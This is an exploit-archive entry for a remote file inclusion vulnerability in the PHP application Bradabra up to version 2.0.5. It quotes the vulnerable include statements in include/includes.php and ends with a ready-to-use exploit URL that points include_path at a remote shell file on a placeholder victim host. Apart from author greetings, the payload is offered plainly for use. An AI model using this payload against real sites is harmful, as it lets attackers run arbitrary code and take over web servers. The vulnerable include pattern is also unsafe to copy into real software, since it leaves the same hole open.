id: 1405
date: 01/20/2007
title: Bradabra <= 2.0.5 (include/includes.php) Remote Inclusion Vulnerability
author: GoLd_M
cves: 

=======================================================================
Bradabra <= 2.0.5 (include/includes.php) Remote Inclusion Vulnerability
=======================================================================



======================================================================
Bradabra <== v2.0.5 Remote File Include Vulnerability               #
======================================================================
Author: GolD_M = Mahmood_ali  &&  Contact: HackEr_@W.Cn             #
======================================================================
SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                     #
======================================================================
In:  /include/includes.php                                          #
======================================================================
Vulnerable Code:                                                    #
======================================================================
include $include_path."config_user.php";                            #
include $include_path."defines.php";                                #
include $include_path."lang.php";                                   #
include $include_path."functions.php";                              #
include $include_path."functions_arch.php";                         #
include $include_path."style.php";                                  #
include $include_path."sql.php";                                    #
include $include_path."db_connect.php";                             #
include $include_path."db.php";                                     #
include $include_path."login_check.php";                            #
include $include_path."functions_js.php";                           #
======================================================================
Exploit:                                                            #
======================================================================
http://Victim.Com/include/includes.php?include_path=Shell.txt       #
======================================================================




#  0day.today [2023-03-25]  #